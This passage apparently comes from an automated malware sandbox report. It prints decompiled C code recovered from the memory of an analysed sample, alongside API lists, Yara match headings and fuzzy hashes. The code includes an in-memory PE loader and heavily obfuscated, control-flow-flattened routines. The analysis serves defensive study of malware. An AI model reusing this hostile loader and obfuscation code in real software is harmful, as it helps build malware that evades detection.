                                              											 *((intOrPtr*)(_t139 + 0x1c)) = _a12;
                                              											 *((intOrPtr*)(_t139 + 0x20)) = _a16;
                                              											 *((intOrPtr*)(_t139 + 0x24)) = _a20;
                                              											 *((intOrPtr*)(_t139 + 0x28)) = _a24;
                                              											 *((intOrPtr*)(_t139 + 0x30)) = _v44;
                                              											_t40 = _t114 + 0x54; // 0xec8b55cc
                                              											if(E100015F0(_a8,  *_t40) == 0) {
                                              												L36:
                                              												_t115 = _v8;
                                              												goto L37;
                                              											} else {
                                              												_t42 = _t114 + 0x54; // 0xec8b55cc
                                              												_t86 = VirtualAlloc(_t148,  *_t42, 0x1000, 4);
                                              												_t43 = _t114 + 0x54; // 0xec8b55cc
                                              												_t149 = _t86;
                                              												E10001F40(_t149, _a4,  *_t43);
                                              												_t89 =  *((intOrPtr*)(_a4 + 0x3c)) + _t149;
                                              												_t150 = _v12;
                                              												 *_t139 = _t89;
                                              												 *((intOrPtr*)(_t89 + 0x34)) = _t150;
                                              												_t90 = E10001620(_a4, _a8, _t114, _t139); // executed
                                              												if(_t90 == 0) {
                                              													goto L36;
                                              												} else {
                                              													_t52 = _t114 + 0x34; // 0xec8b55cc
                                              													_t93 =  *((intOrPtr*)( *_t139 + 0x34)) ==  *_t52;
                                              													_t115 = _v8;
                                              													if( *((intOrPtr*)( *_t139 + 0x34)) ==  *_t52) {
                                              														 *((intOrPtr*)(_t139 + 0x18)) = 1;
                                              													} else {
                                              														 *((intOrPtr*)(_t139 + 0x18)) = E10001E90(_t139, _t93);
                                              													}
                                              													if(E10001470(_t115, _t139) == 0) {
                                              														L37:
                                              														E10001980(_t139);
                                              														return 0;
                                              													} else {
                                              														_t95 = E10001830(_t115, _t139); // executed
                                              														if(_t95 == 0 || E10001730(_t139) == 0) {
                                              															goto L37;
                                              														} else {
                                              															_t98 =  *((intOrPtr*)( *_t139 + 0x28));
                                              															if(_t98 == 0) {
                                              																 *((intOrPtr*)(_t139 + 0x2c)) = 0;
                                              																return _t139;
                                              															} else {
                                              																_t100 = _t98 + _t150;
                                              																if( *(_t139 + 0x14) == 0) {
                                              																	 *((intOrPtr*)(_t139 + 0x2c)) = _t100;
                                              																	return _t139;
                                              																} else {
                                              																	_push(0);
                                              																	_push(1);
                                              																	_push(0x10000000);
                                              																	if( *_t100() != 0) {
                                              																		 *((intOrPtr*)(_t139 + 0x10)) = 1;
                                              																		return _t139;
                                              																	} else {
                                              																		SetLastError(0x45a);
                                              																		E10001980(_t139);
                                              																		return 0;
                                              																	}
                                              																}
                                              															}
                                              														}
                                              													}
                                              												}
                                              											}
                                              										} else {
                                              											VirtualFree(_t148, _t74, 0x8000);
                                              											goto L20;
                                              										}
                                              									} else {
                                              										_t109 = VirtualAlloc(_t72, _t138, 0x3000, 4); // executed
                                              										_t148 = _t109;
                                              										_v12 = _t109;
                                              										if(_t148 == 0) {
                                              											L20:
                                              											SetLastError(0xe);
                                              											return 0;
                                              										} else {
                                              											goto L18;
                                              										}
                                              									}
                                              								} else {
                                              									SetLastError(0xc1);
                                              									return 0;
                                              								}
                                              							}
                                              						}
                                              					} else {
                                              						L3:
                                              						SetLastError(0xc1);
                                              						return 0;
                                              					}
                                              				} else {
                                              					L1:
                                              					SetLastError(0xd);
                                              					return 0;
                                              				}
                                              			}

                                              APIs
                                              • SetLastError.KERNEL32(0000000D,00000000,?,10001B1F,00000000,100013CB,10001E80,10001E60,10001E50,00000000,?,100013CB,00000000,00000000), ref: 10001B47
                                              • SetLastError.KERNEL32(000000C1,00000000,?,10001B1F,00000000,100013CB,10001E80,10001E60,10001E50,00000000,?,100013CB,00000000,00000000), ref: 10001B69
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2115600248.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                              • Associated: 00000007.00000002.2115584356.0000000010000000.00000002.00020000.sdmp
                                              • Associated: 00000007.00000002.2115635529.000000001000D000.00000002.00020000.sdmp
                                              • Associated: 00000007.00000002.2115656527.0000000010012000.00000004.00020000.sdmp
                                              • Associated: 00000007.00000002.2115677339.0000000010015000.00000002.00020000.sdmp
                                              Similarity
                                              • API ID: ErrorLast
                                              • String ID:
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 96%
                                              			E00234B41() {
                                              				char _v520;
                                              				signed int _v524;
                                              				signed int _v528;
                                              				signed int _v532;
                                              				signed int _v536;
                                              				signed int _v540;
                                              				signed int _v544;
                                              				signed int _v548;
                                              				signed int _v552;
                                              				signed int _v556;
                                              				signed int _v560;
                                              				signed int _v564;
                                              				signed int _v568;
                                              				signed int _v572;
                                              				signed int _v576;
                                              				signed int _v580;
                                              				signed int _v584;
                                              				signed int _v588;
                                              				signed int _v592;
                                              				intOrPtr _t200;
                                              				signed int _t202;
                                              				signed int _t206;
                                              				void* _t210;
                                              				signed int _t211;
                                              				signed int _t212;
                                              				void* _t214;
                                              				signed int _t216;
                                              				signed int _t239;
                                              				signed int _t240;
                                              				signed int _t241;
                                              				signed int _t242;
                                              				signed int _t243;
                                              				signed int _t244;
                                              				void* _t245;
                                              				signed int* _t247;
                                              				void* _t249;
                                              
                                              				_t247 =  &_v592;
                                              				_v592 = 0xe399;
                                              				_v592 = _v592 << 2;
                                              				_t214 = 0xf501058;
                                              				_v592 = _v592 << 0xe;
                                              				_v592 = _v592 ^ 0xe399001c;
                                              				_v588 = 0x8f0f;
                                              				_v588 = _v588 * 0x29;
                                              				_t245 = 0;
                                              				_v588 = _v588 ^ 0x0016e94e;
                                              				_v568 = 0x725;
                                              				_t239 = 0x36;
                                              				_v568 = _v568 / _t239;
                                              				_t240 = 0xc;
                                              				_v568 = _v568 * 0x63;
                                              				_v568 = _v568 << 8;
                                              				_v568 = _v568 ^ 0x000ca091;
                                              				_v532 = 0x951;
                                              				_v532 = _v532 << 7;
                                              				_v532 = _v532 ^ 0x0004989a;
                                              				_v524 = 0x2ad;
                                              				_v524 = _v524 | 0xf8213247;
                                              				_v524 = _v524 ^ 0xf82150c2;
                                              				_v548 = 0x8830;
                                              				_v548 = _v548 >> 0xd;
                                              				_v548 = _v548 >> 0xf;
                                              				_v548 = _v548 ^ 0x00006238;
                                              				_v588 = 0xba20;
                                              				_v588 = _v588 | 0x721cc32f;
                                              				_v588 = _v588 ^ 0x721c8c06;
                                              				_v580 = 0x8092;
                                              				_v580 = _v580 + 0xfffffe56;
                                              				_v580 = _v580 / _t240;
                                              				_v580 = _v580 >> 3;
                                              				_v580 = _v580 ^ 0x000005b6;
                                              				_v540 = 0xe99f;
                                              				_v540 = _v540 + 0xfffff8d3;
                                              				_v540 = _v540 | 0x984d7063;
                                              				_v540 = _v540 ^ 0x984d8ec7;
                                              				_v556 = 0xc4eb;
                                              				_t241 = 0x4e;
                                              				_v556 = _v556 * 0x5c;
                                              				_v556 = _v556 + 0x75ac;
                                              				_v556 = _v556 ^ 0x00477921;
                                              				_v536 = 0x9b3b;
                                              				_v536 = _v536 + 0xaa1d;
                                              				_v536 = _v536 ^ 0x00012776;
                                              				_v572 = 0x8e84;
                                              				_v572 = _v572 * 0x29;
                                              				_v572 = _v572 / _t241;
                                              				_v572 = _v572 >> 0xa;
                                              				_v572 = _v572 ^ 0x000020e9;
                                              				_v528 = 0xcb2d;
                                              				_t242 = 0x21;
                                              				_v528 = _v528 / _t242;
                                              				_v528 = _v528 ^ 0x00001b4e;
                                              				_v544 = 0x6df7;
                                              				_v544 = _v544 ^ 0x414c8853;
                                              				_t243 = 0x49;
                                              				_v544 = _v544 * 0x75;
                                              				_v544 = _v544 ^ 0xd824a1d7;
                                              				_v552 = 0xc4f0;
                                              				_v552 = _v552 ^ 0x9d070a5f;
                                              				_v552 = _v552 + 0xffff498d;
                                              				_v552 = _v552 ^ 0x9d0763b6;
                                              				_v564 = 0xe384;
                                              				_v564 = _v564 ^ 0xde12aa62;
                                              				_v564 = _v564 | 0x2c019ae9;
                                              				_v564 = _v564 ^ 0xa4e5f9a5;
                                              				_v564 = _v564 ^ 0x5af67a61;
                                              				_v576 = 0x7d9f;
                                              				_v576 = _v576 + 0x6134;
                                              				_v576 = _v576 | 0x6ccc595a;
                                              				_v576 = _v576 ^ 0x0058e7ee;
                                              				_v576 = _v576 ^ 0x6c9448a2;
                                              				_v592 = 0x396f;
                                              				_v592 = _v592 * 7;
                                              				_v592 = _v592 ^ 0x10cc7cbf;
                                              				_v592 = _v592 ^ 0x10cdfb96;
                                              				_v560 = 0x3078;
                                              				_v560 = _v560 << 8;
                                              				_t244 = _v588;
                                              				_v560 = _v560 / _t243;
                                              				_v560 = _v560 + 0xffff6a19;
                                              				_v560 = _v560 ^ 0x000f142e;
                                              				goto L1;
                                              				do {
                                              					while(1) {
                                              						L1:
                                              						_t249 = _t214 - 0x3227b83a;
                                              						if(_t249 > 0) {
                                              							break;
                                              						}
                                              						if(_t249 == 0) {
                                              							_v584 = 0xc457;
                                              							_v584 = _v584 >> 6;
                                              							_t165 =  &_v584;
                                              							 *_t165 = _v584 ^ 0x0000030d;
                                              							__eflags =  *_t165;
                                              							_t202 =  *0x23ca2c; // 0x4d8300
                                              							 *((intOrPtr*)(_t202 + 0x218)) = E00237CC2;
                                              							L13:
                                              							_t214 = 0x2ded9275;
                                              							continue;
                                              						}
                                              						if(_t214 == 0xf501058) {
                                              							_push(_t214);
                                              							_push(_t214);
                                              							_t206 = E00228736(0x454);
                                              							 *0x23ca2c = _t206;
                                              							__eflags = _t206;
                                              							if(_t206 == 0) {
                                              								goto L23;
                                              							}
                                              							 *((intOrPtr*)(_t206 + 0x214)) = E002320C5;
                                              							_t214 = 0x382146c2;
                                              							continue;
                                              						}
                                              						if(_t214 == 0x204dd1d9) {
                                              							E0022B112();
                                              							_t214 = 0x354eaa90;
                                              							continue;
                                              						}
                                              						if(_t214 == 0x24baa30b) {
                                              							_v584 = 0xe62c;
                                              							_t214 = 0x36e33d60;
                                              							_v584 = _v584 ^ 0x84d80cbd;
                                              							_v584 = _v584 ^ 0x84d8eab8;
                                              							continue;
                                              						}
                                              						if(_t214 != 0x2ded9275) {
                                              							goto L22;
                                              						}
                                              						_push(_t214);
                                              						_push(_t214);
                                              						E0022C6C7(_v536, _v572,  *0x23ca2c, _t214, _v528, _v584, _v544); // executed
                                              						_t247 =  &(_t247[7]);
                                              						_t214 = 0x204dd1d9;
                                              						_t210 = 1;
                                              						_t245 =  ==  ? _t210 : _t245;
                                              					}
                                              					__eflags = _t214 - 0x354eaa90;
                                              					if(__eflags == 0) {
                                              						E00233E3F(_t214,  &_v520, __eflags, _v552, _v564);
                                              						_t200 = E0022E29C(_v576, _v592,  &_v520);
                                              						_t216 =  *0x23ca2c; // 0x4d8300
                                              						_t247 =  &(_t247[3]);
                                              						 *((intOrPtr*)(_t216 + 0x438)) = _t200;
                                              						_t214 = 0xae4e76a;
                                              						goto L22;
                                              					}
                                              					__eflags = _t214 - 0x36e33d60;
                                              					if(_t214 == 0x36e33d60) {
                                              						E00225FB2(_v540, _v556, _t244);
                                              						goto L13;
                                              					}
                                              					__eflags = _t214 - 0x382146c2;
                                              					if(_t214 != 0x382146c2) {
                                              						goto L22;
                                              					}
                                              					_t211 = E00222959(_t214, _v548, _v588, _v580, _v560); // executed
                                              					_t244 = _t211;
                                              					_t247 =  &(_t247[4]);
                                              					__eflags = _t244;
                                              					if(_t244 == 0) {
                                              						_t214 = 0x3227b83a;
                                              					} else {
                                              						_t212 =  *0x23ca2c; // 0x4d8300
                                              						 *((intOrPtr*)(_t212 + 0x224)) = 1;
                                              						_t214 = 0x24baa30b;
                                              					}
                                              					goto L1;
                                              					L22:
                                              					__eflags = _t214 - 0xae4e76a;
                                              				} while (_t214 != 0xae4e76a);
                                              				L23:
                                              				return _t245;
                                              			}








































                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2109584189.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                              • Associated: 00000007.00000002.2109565490.0000000000220000.00000004.00000001.sdmp
                                              • Associated: 00000007.00000002.2109615859.000000000023C000.00000004.00000001.sdmp
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: !yG$,$8b$Q$`=6$`=6$j$j$o9$x0$ $X
                                              • API String ID: 0-3958274775
                                              • Opcode ID: 34301f4765872c0dbd2b4a3acc372438c2240267da056750689c1ea27cf17036
                                              • Instruction ID: c090f4cb66322eb563ca2ed2e67e2bf96525339d5c5a45191c6408910ec297d6
                                              • Opcode Fuzzy Hash: 34301f4765872c0dbd2b4a3acc372438c2240267da056750689c1ea27cf17036
                                              • Instruction Fuzzy Hash: 63A175B11183819FD358DF64D48A42BFBE1FBC4358F204A1DF1969A2A0C3B9DA59CF46
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 97%
                                              			E00233895() {
                                              				char _v524;
                                              				signed int _v528;
                                              				signed int _v532;
                                              				intOrPtr _v536;
                                              				signed int _v548;
                                              				intOrPtr _v552;
                                              				intOrPtr _v556;
                                              				intOrPtr _v560;
                                              				intOrPtr _v564;
                                              				intOrPtr _v568;
                                              				intOrPtr _v572;
                                              				intOrPtr _v576;
                                              				char _v580;
                                              				intOrPtr _v584;
                                              				char _v588;
                                              				signed int _v592;
                                              				signed int _v596;
                                              				signed int _v600;
                                              				signed int _v604;
                                              				signed int _v608;
                                              				signed int _v612;
                                              				signed int _v616;
                                              				signed int _v620;
                                              				signed int _v624;
                                              				signed int _v628;
                                              				signed int _v632;
                                              				signed int _v636;
                                              				unsigned int _v640;
                                              				signed int _v644;
                                              				signed int _v648;
                                              				signed int _v652;
                                              				signed int _v656;
                                              				signed int _v660;
                                              				signed int _v664;
                                              				signed int _v668;
                                              				signed int _v672;
                                              				signed int _v676;
                                              				signed int _v680;
                                              				signed int _v684;
                                              				signed int _v688;
                                              				signed int _v692;
                                              				signed int _v696;
                                              				signed int _v700;
                                              				signed int _t281;
                                              				intOrPtr _t284;
                                              				void* _t286;
                                              				void* _t290;
                                              				void* _t294;
                                              				void* _t295;
                                              				char _t297;
                                              				void* _t303;
                                              				intOrPtr _t321;
                                              				signed int _t325;
                                              				signed int _t326;
                                              				signed int _t327;
                                              				signed int _t328;
                                              				signed int* _t331;
                                              
                                              				_t331 =  &_v700;
                                              				_v532 = _v532 & 0x00000000;
                                              				_v528 = _v528 & 0x00000000;
                                              				_t295 = 0x16120aa4;
                                              				_v536 = 0x65127b;
                                              				_v664 = 0x3b49;
                                              				_v664 = _v664 << 5;
                                              				_v664 = _v664 + 0x6a36;
                                              				_v664 = _v664 >> 7;
                                              				_v664 = _v664 ^ 0x00000fa7;
                                              				_v616 = 0x772f;
                                              				_v616 = _v616 ^ 0x73b15b69;
                                              				_v616 = _v616 ^ 0x73b12d46;
                                              				_v604 = 0xe6c8;
                                              				_v604 = _v604 + 0x8155;
                                              				_v604 = _v604 ^ 0x000105e4;
                                              				_v700 = 0xa5d;
                                              				_v700 = _v700 * 0x52;
                                              				_t294 = 0;
                                              				_v700 = _v700 + 0xffffecf8;
                                              				_t325 = 0x58;
                                              				_v700 = _v700 * 0x66;
                                              				_v700 = _v700 ^ 0x014b32de;
                                              				_v684 = 0xc8e0;
                                              				_v684 = _v684 + 0x308b;
                                              				_v684 = _v684 + 0x2664;
                                              				_v684 = _v684 >> 6;
                                              				_v684 = _v684 ^ 0x00006abe;
                                              				_v676 = 0x796a;
                                              				_v676 = _v676 + 0xffff196c;
                                              				_v676 = _v676 + 0xffffd40e;
                                              				_v676 = _v676 ^ 0xd773f48b;
                                              				_v676 = _v676 ^ 0x288ceae9;
                                              				_v612 = 0x157c;
                                              				_v612 = _v612 << 0x10;
                                              				_v612 = _v612 ^ 0x157c11c9;
                                              				_v652 = 0xe7a2;
                                              				_v652 = _v652 / _t325;
                                              				_v652 = _v652 | 0x448e2e0d;
                                              				_v652 = _v652 ^ 0x448e7eb8;
                                              				_v640 = 0x3ee9;
                                              				_v640 = _v640 * 0x5d;
                                              				_v640 = _v640 >> 0xd;
                                              				_v640 = _v640 ^ 0x0000282d;
                                              				_v648 = 0xf425;
                                              				_v648 = _v648 * 9;
                                              				_v648 = _v648 >> 1;
                                              				_v648 = _v648 ^ 0x0004354a;
                                              				_v608 = 0x24ee;
                                              				_v608 = _v608 + 0x809c;
                                              				_v608 = _v608 ^ 0x0000fdeb;
                                              				_v636 = 0x6dae;
                                              				_v636 = _v636 + 0x1c44;
                                              				_v636 = _v636 + 0x2b83;
                                              				_v636 = _v636 ^ 0x0000a12d;
                                              				_v656 = 0xe590;
                                              				_v656 = _v656 >> 2;
                                              				_v656 = _v656 << 7;
                                              				_v656 = _v656 ^ 0x001cffcc;
                                              				_v668 = 0xb9db;
                                              				_v668 = _v668 >> 0xd;
                                              				_v668 = _v668 + 0x89dd;
                                              				_v668 = _v668 | 0xbce2fd3c;
                                              				_v668 = _v668 ^ 0xbce2f9c6;
                                              				_v596 = 0x1790;
                                              				_v596 = _v596 + 0xffff27ec;
                                              				_v596 = _v596 ^ 0xffff59a3;
                                              				_v672 = 0xffb9;
                                              				_v672 = _v672 + 0xffff618d;
                                              				_v672 = _v672 >> 2;
                                              				_t326 = 0x31;
                                              				_v672 = _v672 * 0x75;
                                              				_v672 = _v672 ^ 0x000b38e4;
                                              				_v644 = 0xc4de;
                                              				_v644 = _v644 + 0xbfb6;
                                              				_v644 = _v644 ^ 0xc1434f22;
                                              				_v644 = _v644 ^ 0xc142a5f5;
                                              				_v680 = 0x8a5a;
                                              				_v680 = _v680 | 0x8f6cf4f7;
                                              				_v680 = _v680 + 0x838e;
                                              				_v680 = _v680 + 0xffffa8f9;
                                              				_v680 = _v680 ^ 0x8f6d4033;
                                              				_v660 = 0xe8e2;
                                              				_v660 = _v660 / _t326;
                                              				_t327 = 0x25;
                                              				_v660 = _v660 * 0x78;
                                              				_v660 = _v660 ^ 0x000205be;
                                              				_v688 = 0x9cd0;
                                              				_v688 = _v688 + 0x8e7d;
                                              				_v688 = _v688 * 0x26;
                                              				_v688 = _v688 * 0x51;
                                              				_v688 = _v688 ^ 0x0e0ecd55;
                                              				_v620 = 0xe1b5;
                                              				_v620 = _v620 / _t327;
                                              				_v620 = _v620 ^ 0x00005557;
                                              				_v696 = 0x769d;
                                              				_v696 = _v696 >> 7;
                                              				_v696 = _v696 | 0x5538ae99;
                                              				_v696 = _v696 << 2;
                                              				_v696 = _v696 ^ 0x54e2b31f;
                                              				_v600 = 0xdcef;
                                              				_v600 = _v600 << 6;
                                              				_v600 = _v600 ^ 0x003705ca;
                                              				_v624 = 0x48eb;
                                              				_v624 = _v624 >> 0xd;
                                              				_v624 = _v624 ^ 0x00002379;
                                              				_v692 = 0xfa2c;
                                              				_v692 = _v692 | 0x4759ecfd;
                                              				_v692 = _v692 >> 0xc;
                                              				_v692 = _v692 >> 9;
                                              				_v692 = _v692 ^ 0x000062c4;
                                              				_v632 = 0xbcd9;
                                              				_v632 = _v632 << 4;
                                              				_v632 = _v632 | 0x68c1d353;
                                              				_v632 = _v632 ^ 0x68cbf855;
                                              				_v628 = 0x848;
                                              				_t328 = 0x1c;
                                              				_v628 = _v628 / _t328;
                                              				_v628 = _v628 ^ 0x00001dd4;
                                              				_t324 = _v628;
                                              				_v592 = 0xa720;
                                              				_v592 = _v592 + 0xffff9569;
                                              				_v592 = _v592 ^ 0x00003c8a;
                                              				do {
                                              					while(_t295 != 0x2b0230e) {
                                              						if(_t295 == 0x16120aa4) {
                                              							_t295 = 0x182cddf3;
                                              							continue;
                                              						} else {
                                              							if(_t295 == 0x182cddf3) {
                                              								E0023AAAE(_v604, _v700, _v684,  &_v588, _v676);
                                              								_t331 =  &(_t331[3]);
                                              								_t295 = 0x2f4d7b3a;
                                              								continue;
                                              							} else {
                                              								if(_t295 == 0x1c4d16fa) {
                                              									_t284 = _v584;
                                              									_t297 = _v588;
                                              									_v548 = _v548 & 0x00000000;
                                              									_v576 = _t284;
                                              									_v568 = _t284;
                                              									_v560 = _t284;
                                              									_v552 = _t284;
                                              									_v580 = _t297;
                                              									_v572 = _t297;
                                              									_v564 = _t297;
                                              									_v556 = _t297;
                                              									_t286 = E0022B6DD(_t297, _v600, _t297, _t324, _v624,  &_v580, _v692); // executed
                                              									_t331 =  &(_t331[5]);
                                              									__eflags = _t286;
                                              									_t294 =  !=  ? 1 : _t294;
                                              									_t295 = 0x2a39a402;
                                              									continue;
                                              								} else {
                                              									if(_t295 == 0x2a39a402) {
                                              										E00234F7D(_v632, _v628, _t324);
                                              									} else {
                                              										if(_t295 == 0x2f4d7b3a) {
                                              											_v588 = _v588 - E0022F46D();
                                              											_t295 = 0x369a1b5f;
                                              											asm("sbb [esp+0x84], edx");
                                              											continue;
                                              										} else {
                                              											_t339 = _t295 - 0x369a1b5f;
                                              											if(_t295 != 0x369a1b5f) {
                                              												goto L16;
                                              											} else {
                                              												_push(_v652);
                                              												_t290 = E0023889D(0x23c9b0, _v612, _t339);
                                              												_pop(_t303);
                                              												_t321 =  *0x23ca2c; // 0x4d8300
                                              												_t224 = _t321 + 0x230; // 0x700047
                                              												E0022C680(_t224, _v648, _v608, _t303, _v636,  *0x23ca2c, _t290,  &_v524);
                                              												_t331 =  &(_t331[7]);
                                              												E00232025(_v656, _t290, _v668, _v596);
                                              												_t295 = 0x2b0230e;
                                              												continue;
                                              											}
                                              										}
                                              									}
                                              								}
                                              							}
                                              						}
                                              						L19:
                                              						return _t294;
                                              					}
                                              					_t281 = E0022B566(_t295, _v664, _v672, _v644, _v616, _v680, _t295, _v660, _v688, 0, _v620, _v696, _v592,  &_v524); // executed
                                              					_t324 = _t281;
                                              					_t331 =  &(_t331[0xc]);
                                              					__eflags = _t281 - 0xffffffff;
                                              					if(__eflags == 0) {
                                              						_t295 = 0x1d984ba2;
                                              						goto L16;
                                              					} else {
                                              						_t295 = 0x1c4d16fa;
                                              						continue;
                                              					}
                                              					goto L19;
                                              					L16:
                                              					__eflags = _t295 - 0x1d984ba2;
                                              				} while (__eflags != 0);
                                              				goto L19;
                                              			}

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2109584189.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                              • Associated: 00000007.00000002.2109565490.0000000000220000.00000004.00000001.sdmp
                                              • Associated: 00000007.00000002.2109615859.000000000023C000.00000004.00000001.sdmp
                                              Yara matches
                                              Similarity
                                              • API ID: CloseHandle
                                              • String ID: saved.Do you still want to force shutdown?$-($/w$6j$:{M/$:{M/$WU$d&$jy$y#$$
                                              • API String ID: 2962429428-1388804607
                                              • Opcode ID: 2e075c7cdf683e3939fe3cbf4af4495db51a26598be845c4cda261b8afa41627
                                              • Instruction ID: 1ddea031e37453bb103bb56d3b2b287b7fb3f7416d7385c528f6140f75e07024
                                              • Opcode Fuzzy Hash: 2e075c7cdf683e3939fe3cbf4af4495db51a26598be845c4cda261b8afa41627
                                              • Instruction Fuzzy Hash: A1D101B15183819FE368CF61C489A5BFBE1BBC4358F108A1DF1D9862A0D7B98659CF43
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 94%
                                              			E002342DA(intOrPtr __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                              				char _v4;
                                              				char _v8;
                                              				signed int _v12;
                                              				intOrPtr _v16;
                                              				signed int _v20;
                                              				signed int _v24;
                                              				signed int _v28;
                                              				unsigned int _v32;
                                              				signed int _v36;
                                              				signed int _v40;
                                              				signed int _v44;
                                              				signed int _v48;
                                              				signed int _v52;
                                              				signed int _v56;
                                              				unsigned int _v60;
                                              				signed int _v64;
                                              				signed int _v68;
                                              				signed int _v72;
                                              				signed int _v76;
                                              				signed int _v80;
                                              				signed int _v84;
                                              				signed int _v88;
                                              				signed int _v92;
                                              				unsigned int _v96;
                                              				signed int _v100;
                                              				signed int _v104;
                                              				signed int _v108;
                                              				signed int _v112;
                                              				signed int _v116;
                                              				signed int _v120;
                                              				signed int _v124;
                                              				signed int _v128;
                                              				intOrPtr _v132;
                                              				signed int _v136;
                                              				signed int _v140;
                                              				signed int _v144;
                                              				intOrPtr _v148;
                                              				signed int _v152;
                                              				signed int _v156;
                                              				signed int _v160;
                                              				signed int _v164;
                                              				signed int _v168;
                                              				signed int _v172;
                                              				void* _t336;
                                              				intOrPtr _t357;
                                              				intOrPtr _t361;
                                              				void* _t365;
                                              				signed int _t368;
                                              				intOrPtr _t379;
                                              				intOrPtr _t380;
                                              				void* _t413;
                                              				signed int _t421;
                                              				signed int _t422;
                                              				signed int _t423;
                                              				signed int _t424;
                                              				signed int _t425;
                                              				signed int _t426;
                                              				signed int _t427;
                                              				intOrPtr* _t428;
                                              				signed int _t431;
                                              				signed int* _t437;
                                              				void* _t439;
                                              
                                              				_t380 = __ecx;
                                              				_push(_a16);
                                              				_v148 = __ecx;
                                              				_push(_a12);
                                              				_push(_a8);
                                              				_push(_a4);
                                              				_push(__edx);
                                              				_push(__ecx);
                                              				E0022602B(_t336);
                                              				_v32 = 0x4bc1;
                                              				_t437 =  &(( &_v172)[6]);
                                              				_v32 = _v32 >> 0xf;
                                              				_v32 = _v32 ^ 0x000002f8;
                                              				_t379 = 0;
                                              				_v168 = 0xbc3a;
                                              				_t431 = 0x3b64c246;
                                              				_v168 = _v168 >> 0xa;
                                              				_t435 = 0;
                                              				_v168 = _v168 << 1;
                                              				_v168 = _v168 << 9;
                                              				_v168 = _v168 ^ 0x0000918a;
                                              				_v96 = 0x296c;
                                              				_v96 = _v96 ^ 0xfe254c59;
                                              				_v96 = _v96 >> 0xf;
                                              				_v96 = _v96 ^ 0x0001a08f;
                                              				_v52 = 0x7e94;
                                              				_v52 = _v52 + 0xffff276a;
                                              				_v52 = _v52 ^ 0xffffb392;
                                              				_v156 = 0x71e;
                                              				_v156 = _v156 << 0xa;
                                              				_v156 = _v156 ^ 0x91e5be42;
                                              				_v156 = _v156 | 0xf592e812;
                                              				_v156 = _v156 ^ 0xf5fb9c3d;
                                              				_v60 = 0xbf5e;
                                              				_v60 = _v60 >> 7;
                                              				_v60 = _v60 ^ 0x00001130;
                                              				_v112 = 0x687f;
                                              				_v112 = _v112 | 0xf46ca00f;
                                              				_t421 = 0x35;
                                              				_v112 = _v112 * 0x78;
                                              				_v112 = _v112 ^ 0x930cd2b7;
                                              				_v152 = 0xc857;
                                              				_v152 = _v152 << 5;
                                              				_v152 = _v152 | 0x37c6acdc;
                                              				_v152 = _v152 + 0xffffd100;
                                              				_v152 = _v152 ^ 0x37df0477;
                                              				_v144 = 0xf477;
                                              				_v144 = _v144 >> 2;
                                              				_v144 = _v144 << 5;
                                              				_v144 = _v144 | 0xf3531cc7;
                                              				_v144 = _v144 ^ 0xf357d736;
                                              				_v120 = 0xcb9;
                                              				_v120 = _v120 + 0xe3f9;
                                              				_v120 = _v120 ^ 0x6ced8dd9;
                                              				_v120 = _v120 ^ 0x6ced4b8c;
                                              				_v20 = 0x5e2b;
                                              				_v20 = _v20 + 0xffff1e4f;
                                              				_v20 = _v20 ^ 0xffff4ba5;
                                              				_v124 = 0x4b0e;
                                              				_v124 = _v124 / _t421;
                                              				_t422 = 0x44;
                                              				_v124 = _v124 / _t422;
                                              				_v124 = _v124 ^ 0x00000f50;
                                              				_v92 = 0x1f74;
                                              				_v92 = _v92 + 0xffffb151;
                                              				_v92 = _v92 ^ 0xde981c2c;
                                              				_v92 = _v92 ^ 0x2167c13f;
                                              				_v48 = 0x349e;
                                              				_v48 = _v48 | 0xa536c816;
                                              				_v48 = _v48 ^ 0xa536ef12;
                                              				_v172 = 0xab81;
                                              				_t423 = 0x46;
                                              				_v172 = _v172 * 0x33;
                                              				_v172 = _v172 + 0xffff1acb;
                                              				_v172 = _v172 ^ 0xbb3feb59;
                                              				_v172 = _v172 ^ 0xbb1e804f;
                                              				_v72 = 0x6207;
                                              				_v72 = _v72 + 0xffff8a84;
                                              				_v72 = _v72 ^ 0xffffdea5;
                                              				_v80 = 0xb702;
                                              				_v80 = _v80 * 0x71;
                                              				_v80 = _v80 + 0xffff1180;
                                              				_v80 = _v80 ^ 0x004fd1d8;
                                              				_v40 = 0x81cb;
                                              				_v40 = _v40 * 0x24;
                                              				_v40 = _v40 ^ 0x001275f3;
                                              				_v88 = 0x5eb0;
                                              				_v88 = _v88 >> 3;
                                              				_v88 = _v88 + 0x92b4;
                                              				_v88 = _v88 ^ 0x0000b644;
                                              				_v160 = 0x12e7;
                                              				_v160 = _v160 ^ 0x069a79b3;
                                              				_v160 = _v160 / _t423;
                                              				_v160 = _v160 << 0xd;
                                              				_v160 = _v160 ^ 0x04c33b64;
                                              				_v84 = 0xf1f4;
                                              				_v84 = _v84 | 0x342cde3b;
                                              				_t424 = 0x1c;
                                              				_v84 = _v84 / _t424;
                                              				_v84 = _v84 ^ 0x01dd3282;
                                              				_v116 = 0xb146;
                                              				_t425 = 0x4f;
                                              				_v116 = _v116 * 0x6c;
                                              				_v116 = _v116 + 0xbfc7;
                                              				_v116 = _v116 ^ 0x004bdc24;
                                              				_v76 = 0x885c;
                                              				_v76 = _v76 >> 3;
                                              				_v76 = _v76 ^ 0x00003fd1;
                                              				_v56 = 0xb3ed;
                                              				_v56 = _v56 + 0xffff0d01;
                                              				_v56 = _v56 ^ 0xffffed6a;
                                              				_v108 = 0xc622;
                                              				_v108 = _v108 | 0x10712732;
                                              				_v108 = _v108 ^ 0x74f95923;
                                              				_v108 = _v108 ^ 0x648892da;
                                              				_v128 = 0x5bd2;
                                              				_v128 = _v128 + 0x6edf;
                                              				_v128 = _v128 >> 2;
                                              				_v128 = _v128 ^ 0x00004896;
                                              				_v164 = 0xe1b;
                                              				_v164 = _v164 / _t425;
